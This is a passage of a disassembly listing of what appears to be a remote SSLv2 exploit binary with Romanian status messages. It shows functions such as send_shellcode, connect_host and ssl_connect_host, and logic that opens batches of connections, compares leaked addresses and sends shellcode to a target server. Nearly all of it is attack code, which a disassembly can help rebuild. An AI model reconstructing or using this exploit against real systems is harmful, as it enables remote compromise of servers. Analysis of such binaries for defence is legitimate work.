08049d0b <main+0x437> mov    %eax,%eax
08049d0d <main+0x439> lea    0x0(,%eax,4),%edx
08049d14 <main+0x440> mov    $0x804e904,%eax
08049d19 <main+0x445> mov    (%edx,%eax,1),%eax
08049d1c <main+0x448> pushl  0x484(%eax)
08049d22 <main+0x44e> pushl  0xffffffe8(%ebp)

Possible reference to string:
"  ssl%d : 0x%x"

08049d25 <main+0x451> push   $0x804c202
08049d2a <main+0x456> call   08048d8c <_init+0x1f8>
08049d2f <main+0x45b> add    $0x10,%esp
08049d32 <main+0x45e> lea    0xffffffe8(%ebp),%eax
08049d35 <main+0x461> incl   (%eax)
08049d37 <main+0x463> jmp    08049cd8 <main+0x404>
08049d39 <main+0x465> lea    0x0(%esi),%esi

Referenced from jump at 08049cde ; 

08049d3c <main+0x468> sub    $0xc,%esp

Possible reference to string:
""

08049d3f <main+0x46b> push   $0x804bfa0
08049d44 <main+0x470> call   08048d8c <_init+0x1f8>
08049d49 <main+0x475> add    $0x10,%esp
08049d4c <main+0x478> movl   $0x1,0xffffffdc(%ebp)
08049d53 <main+0x47f> movl   $0x1,0xffffffe8(%ebp)
08049d5a <main+0x486> mov    %esi,%esi

Referenced from jump at 08049da5 ; 

08049d5c <main+0x488> cmpl   $0x2,0xffffffe8(%ebp)
08049d60 <main+0x48c> jle    08049d64 <main+0x490>
08049d62 <main+0x48e> jmp    08049da8 <main+0x4d4>

Referenced from jump at 08049d60 ; 

08049d64 <main+0x490> mov    0xffffffe8(%ebp),%eax
08049d67 <main+0x493> mov    %eax,%eax
08049d69 <main+0x495> shl    $0x2,%eax
08049d6c <main+0x498> lea    0xfffffffc(%eax),%edx
08049d6f <main+0x49b> mov    $0x804e904,%eax
08049d74 <main+0x4a0> mov    (%edx,%eax,1),%ecx
08049d77 <main+0x4a3> mov    0xffffffe8(%ebp),%eax
08049d7a <main+0x4a6> mov    %eax,%eax
08049d7c <main+0x4a8> lea    0x0(,%eax,4),%edx
08049d83 <main+0x4af> mov    $0x804e904,%eax
08049d88 <main+0x4b4> mov    (%edx,%eax,1),%edx
08049d8b <main+0x4b7> mov    0x484(%ecx),%eax
08049d91 <main+0x4bd> cmp    0x484(%edx),%eax
08049d97 <main+0x4c3> je     08049da0 <main+0x4cc>
08049d99 <main+0x4c5> movl   $0x0,0xffffffdc(%ebp)

Referenced from jump at 08049d97 ; 

08049da0 <main+0x4cc> lea    0xffffffe8(%ebp),%eax
08049da3 <main+0x4cf> incl   (%eax)
08049da5 <main+0x4d1> jmp    08049d5c <main+0x488>
08049da7 <main+0x4d3> nop    

Referenced from jump at 08049d62 ; 

08049da8 <main+0x4d4> cmpl   $0x0,0xffffffdc(%ebp)
08049dac <main+0x4d8> jne    08049dc0 <main+0x4ec>
08049dae <main+0x4da> sub    $0xc,%esp

Possible reference to string:
"* Adresele Nu Se Potrivesc."

08049db1 <main+0x4dd> push   $0x804c212
08049db6 <main+0x4e2> call   08048d8c <_init+0x1f8>
08049dbb <main+0x4e7> add    $0x10,%esp
08049dbe <main+0x4ea> jmp    08049e24 <main+0x550>

Referenced from jump at 08049dac ; 

08049dc0 <main+0x4ec> mov    0x804e904,%eax
08049dc5 <main+0x4f1> pushl  0x484(%eax)
08049dcb <main+0x4f7> mov    0x804e904,%eax
08049dd0 <main+0x4fc> pushl  0x480(%eax)
08049dd6 <main+0x502> pushl  0xfffffffc(%ebp)
08049dd9 <main+0x505> pushl  0x804e910
08049ddf <main+0x50b> call   08049418 <send_shellcode>
08049de4 <main+0x510> add    $0x10,%esp
08049de7 <main+0x513> mov    %eax,%eax
08049de9 <main+0x515> test   %eax,%eax
08049deb <main+0x517> je     08049e08 <main+0x534>
08049ded <main+0x519> sub    $0xc,%esp

Possible reference to string:
"* Conexiune Inchisă."

08049df0 <main+0x51c> push   $0x804c230
08049df5 <main+0x521> call   08048d8c <_init+0x1f8>
08049dfa <main+0x526> add    $0x10,%esp
08049dfd <main+0x529> sub    $0xc,%esp
08049e00 <main+0x52c> push   $0x0
08049e02 <main+0x52e> call   08048dfc <_init+0x268>
08049e07 <main+0x533> nop    

Referenced from jump at 08049deb ; 

08049e08 <main+0x534> sub    $0xc,%esp

Possible reference to string:
"* ShellCode Eronat."

08049e0b <main+0x537> push   $0x804c246
08049e10 <main+0x53c> call   08048d8c <_init+0x1f8>
08049e15 <main+0x541> add    $0x10,%esp
08049e18 <main+0x544> sub    $0xc,%esp
08049e1b <main+0x547> push   $0x0
08049e1d <main+0x549> call   08048dfc <_init+0x268>
08049e22 <main+0x54e> mov    %esi,%esi

Referenced from jump at 08049dbe ; 

08049e24 <main+0x550> movl   $0x0,0xffffffe8(%ebp)
08049e2b <main+0x557> nop    

Referenced from jump at 08049e6f ; 

08049e2c <main+0x558> cmpl   $0x3,0xffffffe8(%ebp)
08049e30 <main+0x55c> jle    08049e34 <main+0x560>
08049e32 <main+0x55e> jmp    08049e74 <main+0x5a0>

Referenced from jump at 08049e30 ; 

08049e34 <main+0x560> mov    0xffffffe8(%ebp),%eax
08049e37 <main+0x563> mov    %eax,%eax
08049e39 <main+0x565> lea    0x0(,%eax,4),%edx
08049e40 <main+0x56c> mov    $0x804e904,%eax
08049e45 <main+0x571> cmpl   $0x0,(%edx,%eax,1)
08049e49 <main+0x575> je     08049e6a <main+0x596>
08049e4b <main+0x577> sub    $0xc,%esp
08049e4e <main+0x57a> mov    0xffffffe8(%ebp),%eax
08049e51 <main+0x57d> mov    %eax,%eax
08049e53 <main+0x57f> lea    0x0(,%eax,4),%edx
08049e5a <main+0x586> mov    $0x804e904,%eax
08049e5f <main+0x58b> pushl  (%edx,%eax,1)
08049e62 <main+0x58e> call   0804a128 <ssl_close>
08049e67 <main+0x593> add    $0x10,%esp

Referenced from jump at 08049e49 ; 

08049e6a <main+0x596> lea    0xffffffe8(%ebp),%eax
08049e6d <main+0x599> incl   (%eax)
08049e6f <main+0x59b> jmp    08049e2c <main+0x558>
08049e71 <main+0x59d> lea    0x0(%esi),%esi

Referenced from jump at 08049e32 ; 

08049e74 <main+0x5a0> cmpl   $0x0,0x804e8fc
08049e7b <main+0x5a7> jne    08049e88 <main+0x5b4>
08049e7d <main+0x5a9> sub    $0xc,%esp
08049e80 <main+0x5ac> push   $0x0
08049e82 <main+0x5ae> call   08048dfc <_init+0x268>
08049e87 <main+0x5b3> nop    

Referenced from jump at 08049e7b ; 

08049e88 <main+0x5b4> mov    0x804e900,%eax
08049e8d <main+0x5b9> add    $0xa,%eax
08049e90 <main+0x5bc> cmp    0x804e8fc,%eax
08049e96 <main+0x5c2> jle    08049eb4 <main+0x5e0>
08049e98 <main+0x5c4> sub    $0xc,%esp

Possible reference to string:
"Număr De Conexiuni Atins.Trecem La Alt IP."

08049e9b <main+0x5c7> push   $0x804c260
08049ea0 <main+0x5cc> call   08048d8c <_init+0x1f8>
08049ea5 <main+0x5d1> add    $0x10,%esp
08049ea8 <main+0x5d4> sub    $0xc,%esp
08049eab <main+0x5d7> push   $0x0
08049ead <main+0x5d9> call   08048dfc <_init+0x268>
08049eb2 <main+0x5de> mov    %esi,%esi

Referenced from jump at 08049e96 ; 

08049eb4 <main+0x5e0> sub    $0xc,%esp
08049eb7 <main+0x5e3> push   $0x7a120
08049ebc <main+0x5e8> call   08048bbc <_init+0x28>
08049ec1 <main+0x5ed> add    $0x10,%esp
08049ec4 <main+0x5f0> sub    $0x8,%esp
08049ec7 <main+0x5f3> mov    0x804e900,%eax
08049ecc <main+0x5f8> add    $0xa,%eax
08049ecf <main+0x5fb> push   %eax

Possible reference to string:
": Deschid %d Conexiuni"

08049ed0 <main+0x5fc> push   $0x804c28c
08049ed5 <main+0x601> call   08048d8c <_init+0x1f8>
08049eda <main+0x606> add    $0x10,%esp
08049edd <main+0x609> movl   $0x0,0xffffffe8(%ebp)

Referenced from jump at 08049f34 ; 

08049ee4 <main+0x610> cmpl   $0x9,0xffffffe8(%ebp)
08049ee8 <main+0x614> jle    08049ef0 <main+0x61c>
08049eea <main+0x616> jmp    08049c6c <main+0x398>
08049eef <main+0x61b> nop    

Referenced from jump at 08049ee8 ; 

08049ef0 <main+0x61c> sub    $0x8,%esp
08049ef3 <main+0x61f> pushl  0xfffffff0(%ebp)
08049ef6 <main+0x622> pushl  0xfffffff4(%ebp)
08049ef9 <main+0x625> call   08049fb8 <connect_host>
08049efe <main+0x62a> add    $0x10,%esp
08049f01 <main+0x62d> mov    %eax,%ecx
08049f03 <main+0x62f> mov    0x804e900,%eax
08049f08 <main+0x634> mov    %eax,%eax
08049f0a <main+0x636> lea    0x0(,%eax,4),%edx
08049f11 <main+0x63d> mov    $0x804e500,%eax
08049f16 <main+0x642> mov    %ecx,(%edx,%eax,1)
08049f19 <main+0x645> incl   0x804e900
08049f1f <main+0x64b> sub    $0xc,%esp
08049f22 <main+0x64e> push   $0x2710
08049f27 <main+0x653> call   08048bbc <_init+0x28>
08049f2c <main+0x658> add    $0x10,%esp
08049f2f <main+0x65b> lea    0xffffffe8(%ebp),%eax
08049f32 <main+0x65e> incl   (%eax)
08049f34 <main+0x660> jmp    08049ee4 <main+0x610>
08049f36 <main+0x662> mov    %esi,%esi

---- Function : get_local_port ----

Referenced from call at 0804943a ; 

08049f38 <get_local_port> push   %ebp
08049f39 <get_local_port+0x1> mov    %esp,%ebp
08049f3b <get_local_port+0x3> sub    $0x28,%esp
08049f3e <get_local_port+0x6> movl   $0x10,0xffffffe4(%ebp)
08049f45 <get_local_port+0xd> sub    $0x4,%esp
08049f48 <get_local_port+0x10> lea    0xffffffe4(%ebp),%eax
08049f4b <get_local_port+0x13> push   %eax
08049f4c <get_local_port+0x14> lea    0xffffffe8(%ebp),%eax
08049f4f <get_local_port+0x17> push   %eax
08049f50 <get_local_port+0x18> pushl  0x8(%ebp)
08049f53 <get_local_port+0x1b> call   08048dac <_init+0x218>
08049f58 <get_local_port+0x20> add    $0x10,%esp
08049f5b <get_local_port+0x23> mov    %eax,%eax
08049f5d <get_local_port+0x25> test   %eax,%eax
08049f5f <get_local_port+0x27> jns    08049f9c <get_local_port+0x64>
08049f61 <get_local_port+0x29> sub    $0x8,%esp
08049f64 <get_local_port+0x2c> sub    $0x4,%esp
08049f67 <get_local_port+0x2f> sub    $0x4,%esp
08049f6a <get_local_port+0x32> call   08048c6c <_init+0xd8>
08049f6f <get_local_port+0x37> add    $0x4,%esp
08049f72 <get_local_port+0x3a> mov    %eax,%eax
08049f74 <get_local_port+0x3c> mov    %eax,%eax
08049f76 <get_local_port+0x3e> pushl  (%eax)
08049f78 <get_local_port+0x40> call   08048c3c <_init+0xa8>
08049f7d <get_local_port+0x45> add    $0x8,%esp
08049f80 <get_local_port+0x48> mov    %eax,%eax
08049f82 <get_local_port+0x4a> push   %eax

Possible reference to string:
"Can't get local port: %s"

08049f83 <get_local_port+0x4b> push   $0x804c3a0
08049f88 <get_local_port+0x50> call   08048d8c <_init+0x1f8>
08049f8d <get_local_port+0x55> add    $0x10,%esp
08049f90 <get_local_port+0x58> sub    $0xc,%esp
08049f93 <get_local_port+0x5b> push   $0x1
08049f95 <get_local_port+0x5d> call   08048dfc <_init+0x268>
08049f9a <get_local_port+0x62> mov    %esi,%esi

Referenced from jump at 08049f5f ; 

08049f9c <get_local_port+0x64> movzwl 0xffffffea(%ebp),%eax
08049fa0 <get_local_port+0x68> sub    $0xc,%esp
08049fa3 <get_local_port+0x6b> push   %eax
08049fa4 <get_local_port+0x6c> call   08048cfc <_init+0x168>
08049fa9 <get_local_port+0x71> add    $0x10,%esp
08049fac <get_local_port+0x74> mov    %eax,%eax
08049fae <get_local_port+0x76> mov    %eax,%eax
08049fb0 <get_local_port+0x78> movzwl %ax,%eax
08049fb3 <get_local_port+0x7b> mov    %eax,%eax
08049fb5 <get_local_port+0x7d> leave  
08049fb6 <get_local_port+0x7e> ret    
08049fb7 <get_local_port+0x7f> nop    

---- Function : connect_host ----

Referenced from call at 08049c45 ; 08049ef9 ; 0804a112 ; 

08049fb8 <connect_host> push   %ebp
08049fb9 <connect_host+0x1> mov    %esp,%ebp
08049fbb <connect_host+0x3> sub    $0x28,%esp
08049fbe <connect_host+0x6> movw   $0x2,0xffffffe8(%ebp)
08049fc4 <connect_host+0xc> mov    0x8(%ebp),%eax
08049fc7 <connect_host+0xf> mov    %eax,0xffffffec(%ebp)
08049fca <connect_host+0x12> movzwl 0xc(%ebp),%eax
08049fce <connect_host+0x16> sub    $0xc,%esp
08049fd1 <connect_host+0x19> push   %eax
08049fd2 <connect_host+0x1a> call   08048e4c <_init+0x2b8>
08049fd7 <connect_host+0x1f> add    $0x10,%esp
08049fda <connect_host+0x22> mov    %eax,%eax
08049fdc <connect_host+0x24> mov    %eax,%eax
08049fde <connect_host+0x26> mov    %ax,0xffffffea(%ebp)
08049fe2 <connect_host+0x2a> sub    $0x4,%esp
08049fe5 <connect_host+0x2d> push   $0x0
08049fe7 <connect_host+0x2f> push   $0x1
08049fe9 <connect_host+0x31> push   $0x2
08049feb <connect_host+0x33> call   08048e7c <_init+0x2e8>
08049ff0 <connect_host+0x38> add    $0x10,%esp
08049ff3 <connect_host+0x3b> mov    %eax,%eax
08049ff5 <connect_host+0x3d> mov    %eax,0xffffffe4(%ebp)
08049ff8 <connect_host+0x40> cmpl   $0x0,0xffffffe4(%ebp)
08049ffc <connect_host+0x44> jg     0804a018 <connect_host+0x60>
08049ffe <connect_host+0x46> sub    $0xc,%esp

Possible reference to string:
"Could not create a socket"

0804a001 <connect_host+0x49> push   $0x804c3ba
0804a006 <connect_host+0x4e> call   08048d8c <_init+0x1f8>
0804a00b <connect_host+0x53> add    $0x10,%esp
0804a00e <connect_host+0x56> sub    $0xc,%esp
0804a011 <connect_host+0x59> push   $0x1
0804a013 <connect_host+0x5b> call   08048dfc <_init+0x268>

Referenced from jump at 08049ffc ; 

0804a018 <connect_host+0x60> sub    $0x4,%esp
0804a01b <connect_host+0x63> push   $0x10
0804a01d <connect_host+0x65> lea    0xffffffe8(%ebp),%eax
0804a020 <connect_host+0x68> push   %eax
0804a021 <connect_host+0x69> pushl  0xffffffe4(%ebp)
0804a024 <connect_host+0x6c> call   08048e5c <_init+0x2c8>
0804a029 <connect_host+0x71> add    $0x10,%esp
0804a02c <connect_host+0x74> mov    %eax,%eax
0804a02e <connect_host+0x76> test   %eax,%eax
0804a030 <connect_host+0x78> jns    0804a06c <connect_host+0xb4>
0804a032 <connect_host+0x7a> sub    $0x8,%esp
0804a035 <connect_host+0x7d> sub    $0x4,%esp
0804a038 <connect_host+0x80> sub    $0x4,%esp
0804a03b <connect_host+0x83> call   08048c6c <_init+0xd8>
0804a040 <connect_host+0x88> add    $0x4,%esp
0804a043 <connect_host+0x8b> mov    %eax,%eax
0804a045 <connect_host+0x8d> mov    %eax,%eax
0804a047 <connect_host+0x8f> pushl  (%eax)
0804a049 <connect_host+0x91> call   08048c3c <_init+0xa8>
0804a04e <connect_host+0x96> add    $0x8,%esp
0804a051 <connect_host+0x99> mov    %eax,%eax
0804a053 <connect_host+0x9b> push   %eax

Possible reference to string:
"Connection failed: %s"

0804a054 <connect_host+0x9c> push   $0x804c3d5
0804a059 <connect_host+0xa1> call   08048d8c <_init+0x1f8>
0804a05e <connect_host+0xa6> add    $0x10,%esp
0804a061 <connect_host+0xa9> sub    $0xc,%esp
0804a064 <connect_host+0xac> push   $0x1
0804a066 <connect_host+0xae> call   08048dfc <_init+0x268>
0804a06b <connect_host+0xb3> nop    

Referenced from jump at 0804a030 ; 

0804a06c <connect_host+0xb4> mov    0xffffffe4(%ebp),%eax
0804a06f <connect_host+0xb7> mov    %eax,%eax
0804a071 <connect_host+0xb9> leave  
0804a072 <connect_host+0xba> ret    
0804a073 <connect_host+0xbb> nop    

---- Function : ssl_connect_host ----

Referenced from call at 08049c98 ; 

0804a074 <ssl_connect_host> push   %ebp
0804a075 <ssl_connect_host+0x1> mov    %esp,%ebp
0804a077 <ssl_connect_host+0x3> sub    $0x8,%esp
0804a07a <ssl_connect_host+0x6> cmpl   $0x0,0x10(%ebp)
0804a07e <ssl_connect_host+0xa> je     0804a090 <ssl_connect_host+0x1c>
0804a080 <ssl_connect_host+0xc> sub    $0xc,%esp

Possible reference to string:
" -> ssl_connect_host"

0804a083 <ssl_connect_host+0xf> push   $0x804c3ec
0804a088 <ssl_connect_host+0x14> call   08048d8c <_init+0x1f8>
0804a08d <ssl_connect_host+0x19> add    $0x10,%esp

Referenced from jump at 0804a07e ; 

0804a090 <ssl_connect_host+0x1c> sub    $0xc,%esp
0804a093 <ssl_connect_host+0x1f> push   $0x488
0804a098 <ssl_connect_host+0x24> call   08048c8c <_init+0xf8>
0804a09d <ssl_connect_host+0x29> add    $0x10,%esp
0804a0a0 <ssl_connect_host+0x2c> mov    %eax,%eax
0804a0a2 <ssl_connect_host+0x2e> mov    %eax,0xfffffffc(%ebp)
0804a0a5 <ssl_connect_host+0x31> mov    0xfffffffc(%ebp),%eax
0804a0a8 <ssl_connect_host+0x34> test   %eax,%eax
0804a0aa <ssl_connect_host+0x36> jne    0804a0c8 <ssl_connect_host+0x54>
0804a0ac <ssl_connect_host+0x38> sub    $0xc,%esp

Possible reference to string:
"Can't allocate memory"

0804a0af <ssl_connect_host+0x3b> push   $0x804c402
0804a0b4 <ssl_connect_host+0x40> call   08048d8c <_init+0x1f8>
0804a0b9 <ssl_connect_host+0x45> add    $0x10,%esp
0804a0bc <ssl_connect_host+0x48> sub    $0xc,%esp
0804a0bf <ssl_connect_host+0x4b> push   $0x1
0804a0c1 <ssl_connect_host+0x4d> call   08048dfc <_init+0x268>
0804a0c6 <ssl_connect_host+0x52> mov    %esi,%esi

Referenced from jump at 0804a0aa ; 

0804a0c8 <ssl_connect_host+0x54> mov    0xfffffffc(%ebp),%eax
0804a0cb <ssl_connect_host+0x57> movl   $0x0,0x74(%eax)
0804a0d2 <ssl_connect_host+0x5e> mov    0xfffffffc(%ebp),%eax
0804a0d5 <ssl_connect_host+0x61> movl   $0x0,0x70(%eax)
0804a0dc <ssl_connect_host+0x68> mov    0xfffffffc(%ebp),%eax
0804a0df <ssl_connect_host+0x6b> movl   $0x0,0x6c(%eax)
0804a0e6 <ssl_connect_host+0x72> mov    0xfffffffc(%ebp),%edx
0804a0e9 <ssl_connect_host+0x75> mov    0x10(%ebp),%eax
0804a0ec <ssl_connect_host+0x78> mov    %eax,0x78(%edx)
0804a0ef <ssl_connect_host+0x7b> mov    0xfffffffc(%ebp),%eax
0804a0f2 <ssl_connect_host+0x7e> movl   $0x0,0x480(%eax)
0804a0fc <ssl_connect_host+0x88> mov    0xfffffffc(%ebp),%eax
0804a0ff <ssl_connect_host+0x8b> movl   $0x0,0x484(%eax)
0804a109 <ssl_connect_host+0x95> sub    $0x8,%esp
0804a10c <ssl_connect_host+0x98> pushl  0xc(%ebp)
0804a10f <ssl_connect_host+0x9b> pushl  0x8(%ebp)
0804a112 <ssl_connect_host+0x9e> call   08049fb8 <connect_host>
0804a117 <ssl_connect_host+0xa3> add    $0x10,%esp
0804a11a <ssl_connect_host+0xa6> mov    %eax,%edx
0804a11c <ssl_connect_host+0xa8> mov    0xfffffffc(%ebp),%eax
0804a11f <ssl_connect_host+0xab> mov    %edx,(%eax)
0804a121 <ssl_connect_host+0xad> mov    0xfffffffc(%ebp),%eax
0804a124 <ssl_connect_host+0xb0> mov    %eax,%eax
0804a126 <ssl_connect_host+0xb2> leave  
0804a127 <ssl_connect_host+0xb3> ret    

---- Function : ssl_close ----

Referenced from call at 0804975c ; 08049e62 ; 

0804a128 <ssl_close> push   %ebp
0804a129 <ssl_close+0x1> mov    %esp,%ebp
0804a12b <ssl_close+0x3> sub    $0x8,%esp
0804a12e <ssl_close+0x6> sub    $0xc,%esp
0804a131 <ssl_close+0x9> mov    0x8(%ebp),%eax
0804a134 <ssl_close+0xc> pushl  (%eax)
0804a136 <ssl_close+0xe> call   08048c0c <_init+0x78>
0804a13b <ssl_close+0x13> add    $0x10,%esp
0804a13e <ssl_close+0x16> sub    $0xc,%esp
0804a141 <ssl_close+0x19> pushl  0x8(%ebp)
0804a144 <ssl_close+0x1c> call   08048e2c <_init+0x298>
0804a149 <ssl_close+0x21> add    $0x10,%esp
0804a14c <ssl_close+0x24> mov    $0x0,%eax
0804a151 <ssl_close+0x29> leave  
0804a152 <ssl_close+0x2a> ret    
0804a153 <ssl_close+0x2b> nop    

---- Function : ssl_error ----

Referenced from call at 0804a44f ; 0804a529 ; 

0804a154 <ssl_error> push   %ebp
0804a155 <ssl_error+0x1> mov    %esp,%ebp
0804a157 <ssl_error+0x3> sub    $0x8,%esp
0804a15a <ssl_error+0x6> mov    0x8(%ebp),%eax
0804a15d <ssl_error+0x9> movl   $0x3,0x7c(%eax)
0804a164 <ssl_error+0x10> cmpl   $0x6,0xc(%ebp)
0804a168 <ssl_error+0x14> ja     0804a20c <ssl_error+0xb8>
0804a16e <ssl_error+0x1a> mov    0xc(%ebp),%eax
0804a171 <ssl_error+0x1d> mov    %eax,%eax
0804a173 <ssl_error+0x1f> shl    $0x2,%eax
0804a176 <ssl_error+0x22> mov    0x804c590(%eax),%eax
0804a17c <ssl_error+0x28> jmp    *%eax
0804a17e <ssl_error+0x2a> mov    %esi,%esi
0804a180 <ssl_error+0x2c> sub    $0x8,%esp

Possible reference to string:
"Server error: SSL2_PE_UNDEFINED_ERROR (0x00)"

0804a183 <ssl_error+0x2f> push   $0x804c420
0804a188 <ssl_error+0x34> mov    0x8(%ebp),%eax
0804a18b <ssl_error+0x37> sub    $0xffffff80,%eax
0804a18e <ssl_error+0x3a> push   %eax
0804a18f <ssl_error+0x3b> call   08048e6c <_init+0x2d8>
0804a194 <ssl_error+0x40> add    $0x10,%esp
0804a197 <ssl_error+0x43> jmp    0804a226 <ssl_error+0xd2>
0804a19c <ssl_error+0x48> sub    $0x8,%esp

Possible reference to string:
"Server error: SSL2_PE_NO_CIPHER (0x01)"

0804a19f <ssl_error+0x4b> push   $0x804c460
0804a1a4 <ssl_error+0x50> mov    0x8(%ebp),%eax
0804a1a7 <ssl_error+0x53> sub    $0xffffff80,%eax
0804a1aa <ssl_error+0x56> push   %eax
0804a1ab <ssl_error+0x57> call   08048e6c <_init+0x2d8>
0804a1b0 <ssl_error+0x5c> add    $0x10,%esp
0804a1b3 <ssl_error+0x5f> jmp    0804a226 <ssl_error+0xd2>
0804a1b5 <ssl_error+0x61> lea    0x0(%esi),%esi
0804a1b8 <ssl_error+0x64> sub    $0x8,%esp

Possible reference to string:
"Server error: SSL2_PE_NO_CERTIFICATE (0x02)"

0804a1bb <ssl_error+0x67> push   $0x804c4a0
0804a1c0 <ssl_error+0x6c> mov    0x8(%ebp),%eax
0804a1c3 <ssl_error+0x6f> sub    $0xffffff80,%eax
0804a1c6 <ssl_error+0x72> push   %eax
0804a1c7 <ssl_error+0x73> call   08048e6c <_init+0x2d8>
0804a1cc <ssl_error+0x78> add    $0x10,%esp
0804a1cf <ssl_error+0x7b> jmp    0804a226 <ssl_error+0xd2>
0804a1d1 <ssl_error+0x7d> lea    0x0(%esi),%esi
0804a1d4 <ssl_error+0x80> sub    $0x8,%esp

Possible reference to string:
"Server error: SSL2_PE_BAD_CERTIFICATE (0x03)"

0804a1d7 <ssl_error+0x83> push   $0x804c4e0
0804a1dc <ssl_error+0x88> mov    0x8(%ebp),%eax
0804a1df <ssl_error+0x8b> sub    $0xffffff80,%eax
0804a1e2 <ssl_error+0x8e> push   %eax
0804a1e3 <ssl_error+0x8f> call   08048e6c <_init+0x2d8>
0804a1e8 <ssl_error+0x94> add    $0x10,%esp
0804a1eb <ssl_error+0x97> jmp    0804a226 <ssl_error+0xd2>
0804a1ed <ssl_error+0x99> lea    0x0(%esi),%esi
0804a1f0 <ssl_error+0x9c> sub    $0x8,%esp

Possible reference to string:
"Server error: SSL2_PE_UNSUPPORTED_CERTIFICATE_TYPE (0x06)"

0804a1f3 <ssl_error+0x9f> push   $0x804c520
0804a1f8 <ssl_error+0xa4> mov    0x8(%ebp),%eax
0804a1fb <ssl_error+0xa7> sub    $0xffffff80,%eax
0804a1fe <ssl_error+0xaa> push   %eax
0804a1ff <ssl_error+0xab> call   08048e6c <_init+0x2d8>
0804a204 <ssl_error+0xb0> add    $0x10,%esp
0804a207 <ssl_error+0xb3> jmp    0804a226 <ssl_error+0xd2>
0804a209 <ssl_error+0xb5> lea    0x0(%esi),%esi

Referenced from jump at 0804a168 ; 

0804a20c <ssl_error+0xb8> sub    $0x4,%esp
0804a20f <ssl_error+0xbb> pushl  0xc(%ebp)

Possible reference to string:
"Unrecognized server error: 0x%02x"

0804a212 <ssl_error+0xbe> push   $0x804c560
0804a217 <ssl_error+0xc3> mov    0x8(%ebp),%eax
0804a21a <ssl_error+0xc6> sub    $0xffffff80,%eax
0804a21d <ssl_error+0xc9> push   %eax
0804a21e <ssl_error+0xca> call   08048e6c <_init+0x2d8>
0804a223 <ssl_error+0xcf> add    $0x10,%esp

Referenced from jump at 0804a197 ; 0804a1b3 ; 0804a1cf ; 0804a1eb ; 0804a207 ; 

0804a226 <ssl_error+0xd2> mov    $0x0,%eax
0804a22b <ssl_error+0xd7> leave  
0804a22c <ssl_error+0xd8> ret    
0804a22d <ssl_error+0xd9> lea    0x0(%esi),%esi

---- Function : read_data ----

Referenced from call at 0804a2cf ; 0804a343 ; 0804a3ce ; 

0804a230 <read_data> push   %ebp
0804a231 <read_data+0x1> mov    %esp,%ebp
0804a233 <read_data+0x3> sub    $0x8,%esp
0804a236 <read_data+0x6> mov    0x10(%ebp),%eax
0804a239 <read_data+0x9> mov    %eax,0xfffffff8(%ebp)

Referenced from jump at 0804a2b0 ; 

0804a23c <read_data+0xc> sub    $0x4,%esp
0804a23f <read_data+0xf> pushl  0xfffffff8(%ebp)
0804a242 <read_data+0x12> pushl  0xc(%ebp)
0804a245 <read_data+0x15> pushl  0x8(%ebp)
0804a248 <read_data+0x18> call   08048ebc <_init+0x328>
0804a24d <read_data+0x1d> add    $0x10,%esp
0804a250 <read_data+0x20> mov    %eax,%eax
0804a252 <read_data+0x22> mov    %eax,0xfffffffc(%ebp)
0804a255 <read_data+0x25> cmpl   $0x0,0xfffffffc(%ebp)
0804a259 <read_data+0x29> jns    0804a294 <read_data+0x64>
0804a25b <read_data+0x2b> sub    $0x8,%esp
0804a25e <read_data+0x2e> sub    $0x4,%esp
0804a261 <read_data+0x31> sub    $0x4,%esp
0804a264 <read_data+0x34> call   08048c6c <_init+0xd8>
0804a269 <read_data+0x39> add    $0x4,%esp
0804a26c <read_data+0x3c> mov    %eax,%eax
0804a26e <read_data+0x3e> mov    %eax,%eax
0804a270 <read_data+0x40> pushl  (%eax)
0804a272 <read_data+0x42> call   08048c3c <_init+0xa8>
0804a277 <read_data+0x47> add    $0x8,%esp
0804a27a <read_data+0x4a> mov    %eax,%eax
0804a27c <read_data+0x4c> push   %eax

Possible reference to string:
"Error in read: %s"

0804a27d <read_data+0x4d> push   $0x804c5ac
0804a282 <read_data+0x52> call   08048d8c <_init+0x1f8>
0804a287 <read_data+0x57> add    $0x10,%esp
0804a28a <read_data+0x5a> sub    $0xc,%esp
0804a28d <read_data+0x5d> push   $0x1
0804a28f <read_data+0x5f> call   08048dfc <_init+0x268>

Referenced from jump at 0804a259 ; 

0804a294 <read_data+0x64> cmpl   $0x0,0xfffffffc(%ebp)
0804a298 <read_data+0x68> jne    0804a2a4 <read_data+0x74>
0804a29a <read_data+0x6a> mov    $0x0,%eax
0804a29f <read_data+0x6f> jmp    0804a2b7 <read_data+0x87>
0804a2a1 <read_data+0x71> lea    0x0(%esi),%esi

Referenced from jump at 0804a298 ; 

0804a2a4 <read_data+0x74> mov    0xfffffffc(%ebp),%edx
0804a2a7 <read_data+0x77> lea    0xfffffff8(%ebp),%eax
0804a2aa <read_data+0x7a> sub    %edx,(%eax)
0804a2ac <read_data+0x7c> cmpl   $0x0,0xfffffff8(%ebp)
0804a2b0 <read_data+0x80> jg     0804a23c <read_data+0xc>
0804a2b2 <read_data+0x82> mov    0x10(%ebp),%eax
0804a2b5 <read_data+0x85> mov    %eax,%eax

Referenced from jump at 0804a29f ; 

0804a2b7 <read_data+0x87> leave  
0804a2b8 <read_data+0x88> ret    
0804a2b9 <read_data+0x89> lea    0x0(%esi),%esi

---- Function : read_ssl_packet ----

Referenced from call at 0804a85f ; 0804b09f ; 0804b293 ; 0804b42b ; 

0804a2bc <read_ssl_packet> push   %ebp
0804a2bd <read_ssl_packet+0x1> mov    %esp,%ebp
0804a2bf <read_ssl_packet+0x3> sub    $0x8,%esp
0804a2c2 <read_ssl_packet+0x6> sub    $0x4,%esp
0804a2c5 <read_ssl_packet+0x9> push   $0x2
0804a2c7 <read_ssl_packet+0xb> pushl  0xc(%ebp)
0804a2ca <read_ssl_packet+0xe> mov    0x8(%ebp),%eax
0804a2cd <read_ssl_packet+0x11> pushl  (%eax)
0804a2cf <read_ssl_packet+0x13> call   0804a230 <read_data>
0804a2d4 <read_ssl_packet+0x18> add    $0x10,%esp
0804a2d7 <read_ssl_packet+0x1b> mov    %eax,%eax
0804a2d9 <read_ssl_packet+0x1d> test   %eax,%eax
0804a2db <read_ssl_packet+0x1f> jne    0804a308 <read_ssl_packet+0x4c>
0804a2dd <read_ssl_packet+0x21> mov    0x8(%ebp),%eax
0804a2e0 <read_ssl_packet+0x24> movl   $0x1,0x7c(%eax)
0804a2e7 <read_ssl_packet+0x2b> sub    $0x8,%esp

Possible reference to string:
"Connection unexpectedly closed"

0804a2ea <read_ssl_packet+0x2e> push   $0x804c5c0
0804a2ef <read_ssl_packet+0x33> mov    0x8(%ebp),%eax
0804a2f2 <read_ssl_packet+0x36> sub    $0xffffff80,%eax
0804a2f5 <read_ssl_packet+0x39> push   %eax
